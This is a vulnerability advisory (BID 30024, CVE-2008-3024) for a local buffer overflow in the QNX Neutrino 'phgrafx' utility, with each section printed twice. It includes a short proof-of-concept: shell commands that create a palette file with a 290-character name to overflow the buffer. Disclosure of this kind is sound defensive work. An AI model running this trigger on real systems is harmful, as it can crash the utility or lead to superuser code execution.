QNX Neutrino RTOS 'phgrafx' Local Buffer Overflow Vulnerability
BID:30024
Info
QNX Neutrino RTOS 'phgrafx' Local Buffer Overflow Vulnerability
| Bugtraq ID: | 30024 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2008-3024 |
| Remote: | No |
| Local: | Yes |
| Published: | Jul 01 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | Filipe Balestra and Rodrigo Rubira Branco |
| Vulnerable: |
QNX RTOS 6.3.2 QNX RTOS 6.3 |
| Not Vulnerable: | |
Discussion
QNX Neutrino RTOS 'phgrafx' Local Buffer Overflow Vulnerability
QNX Neutrino RTOS is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. This issue affects the 'phgrafx' utility.
Attackers can exploit this issue to execute arbitrary code with superuser privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts will result in a denial of service.
QNX Neutrino RTOS 6.3.2 and 6.3.0 are vulnerable; other versions may be affected as well.
QNX Neutrino RTOS is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. This issue affects the 'phgrafx' utility.
Attackers can exploit this issue to execute arbitrary code with superuser privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts will result in a denial of service.
QNX Neutrino RTOS 6.3.2 and 6.3.0 are vulnerable; other versions may be affected as well.
Exploit / POC
QNX Neutrino RTOS 'phgrafx' Local Buffer Overflow Vulnerability
The following proof of concept is available:
# PHOTON_PATH=/tmp
# cd /tmp
# mkdir palette
# cd palette
# touch `perl -e 'print "A" x 290 . ".pal"'`
# /usr/photon/bin/phgrafx
Currently we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
The following proof of concept is available:
# PHOTON_PATH=/tmp
# cd /tmp
# mkdir palette
# cd palette
# touch `perl -e 'print "A" x 290 . ".pal"'`
# /usr/photon/bin/phgrafx
Currently we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution / Fix
QNX Neutrino RTOS 'phgrafx' Local Buffer Overflow Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
QNX Neutrino RTOS 'phgrafx' Local Buffer Overflow Vulnerability
References:
References:
- QNX Homepage (QNX Software Systems Ltd.)
- SCANIT-2008-001 QNX phgrafx Privilege Escalation Vulnerability (Scanit)
- [SCANIT-2008-001] QNX phgrafx Privilege Escalation Vulnerability (Scanit Labs
)